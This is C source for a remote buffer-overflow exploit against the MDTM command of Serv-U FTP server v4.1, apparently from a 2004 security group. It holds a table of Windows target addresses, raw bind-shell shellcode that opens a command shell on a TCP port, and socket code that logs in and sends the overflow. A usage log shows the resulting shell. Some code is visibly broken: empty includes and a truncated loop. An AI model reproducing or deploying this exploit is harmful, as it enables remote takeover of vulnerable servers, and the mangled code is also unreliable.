/* Copyright Š Rosiello Security http://www.rosiello.org ================ ---+++ Not for public releases rosiello and friends only !! ++--- -== Remote Exploit for serv-u version v4.1 [MDTM] ==-- Code by: rave Contact: rave@rosiello.org Date: Feb 2004 Remote overflow in the MDTM command :| ( seh methode used to exploit ) Copyright Ž Rosiello Security http://www.rosiello.org Target Number Target Name Library Adress ============= =========== =============== 0 Demo 0xBADC0DED 1 Windows XP Home Edtion SP1. 0x76AF2A3A 2 Windows XP Pro Edtion SP1. 0x76AF2A3A 3 Win2k Pro Edtion. 0x00BBFDDC Usage C:\>serv_u-expl localhost 21 rave A390kb 1 [+] Winsock Inalized [+] Overflowing string is Prepared [+] Connected to localhost:21 [+] target is running Windows XP Home Edtion SP1. [+] Login send [+] Overflowing string is send telnet localhost 28876 Microsoft Windows XP [versie 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. pff Greetz to every one !! */ #include #include #include #include #include // Darn fucking 1337 macro shit #define ISIP(m) (!(inet_addr(m) ==-1)) #define offset 71 char *hostname; char *user; char *passwd; int port; int choice; struct remote_targets { char *os; unsigned long sh_addr; } target [] ={ /* Option`s for your eyes only :D*/ "Demo ", 0xbadc0ded, "Windows XP Home Edtion SP1. ", 0x76AF2A3A, "Windows XP Pro Edtion SP1. ", 0x76AF2A3A, "Win2k Pro Edtion. ", 0x00bbfddc, }; //Bindcode spawns a binshell on port 28876 (Thanks to metasploit.com guys) unsigned char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52" "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1" "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a" "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b" "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32" "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff" "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe" "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50" "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff" "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89" "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff" "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60" "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89" "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56" "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53" "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53" "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf" "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf" "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff" "\x83\xc4\x5c\x61\xeb\x89\x41"; unsigned char _bad_rave [] = "\x90\x90\x90\xe9\x9b\xf6\xff\xff\x90\x90"; unsigned char the_seh_show__ [] = "\xeb\x9\x90\x90"; /// oooh yeah uuuh right .... int usage () { int i; fprintf(stdout,"Copyright Š Rosiello Security\n"); fprintf(stdout,"http://www.rosiello.org\n\n"); fprintf(stdout,"Target Number\t\tTarget Name\t\t\t\tLibrary Adress\n"); fprintf(stdout,"=============\t\t===========\t\t\t\t===============\n"); for (i=0;i < 4;i++) fprintf(stdout,"%d\t\t\t%s\t\t 0x%p\n",i,target[i].os,target[i].sh_addr); fprintf(stdout,"\n\nUsage \n"); exit(0); } char *host_ip; unsigned long getip(char *hostname) { struct hostent *hp; if (ISIP(hostname)) return inet_addr(hostname); if ((hp = gethostbyname(hostname))==NULL) { perror ("[+] gethostbyname() failed check the existance of the host.\n"); exit(-1); } inet_addr(inet_ntoa(*((struct in_addr *)hp->h_addr))); } int main(int argc,char **argv) { struct sockaddr_in ooh; WSADATA wsadata; char login[1024]; char buffer[1024]; char *ptr; int len; int i; int oops; int sd; if (argc < 2) usage(argv[0]); hostname = argv [ 1 ] ; port = atoi ( argv [ 2 ] ); user = argv [ 3 ] ; passwd = argv [ 4 ] ; choice = atoi ( argv [ 5 ] ) ; if (!(oops=WSAStartup(0x101, &wsadata)==0)) { fprintf ( stderr, "[!] Error starting socket operations \n") ; exit ( -1 ) ; } fprintf(stdout,"[+] Winsock Inalized\n"); /* Lets start making a litle setup Change the port if you have to */ ooh.sin_addr.s_addr = getip(hostname); ooh.sin_port = htons(port); ooh.sin_family = AF_INET; memset(buffer ,0x00 ,sizeof ( buffer )); memset(login ,0x00 ,sizeof ( login )); len=sprintf(buffer,"%s","MDTM 20031111111111+" ); ptr=buffer+len; for (i=len; i 0xbad rave<--\r\n\r\n", ((char *)&target[1].sh_addr), _bad_rave, shellcode ); fprintf(stdout,"[+] Overflowing string is Prepared\n"); sprintf(login,"USER %s\r\nPASS %s\r\n",user,passwd); sprintf(buffer+strlen(buffer),"\r\n"); // ok ok here`s ur sock() sd = socket(AF_INET, SOCK_STREAM,IPPROTO_TCP); if (!sd<0) { fprintf(stderr,"[!] socket() failed.\n");exit (-1); } // Knock knock ... hi i want to hook up with you oops=connect(sd, (struct sockaddr *)&ooh, sizeof( ooh )); if(oops!=0) { fprintf(stderr,"[!] connect() failed.\n"); exit(-1); } fprintf(stdout,"[+] Connected to %s:%d\n",hostname,port); fprintf(stdout,"[+] target is running %s\n",target[choice].os); // Sending the login i = send(sd,login,strlen(login),0); if (!i <0) { fprintf (stdout,"[!] Send() failed\n"); exit (-1) ; } fprintf(stdout,"[+] Login send\n"); // Sending some Dangerous stuff i = send(sd,buffer,strlen(buffer),0); if (!i <0) { fprintf (stdout,"[!] Send() failed\n"); exit (-1) ; } fprintf(stdout,"[+] Overflowing string is send\n"); WSACleanup(); // [EOF] return 0; }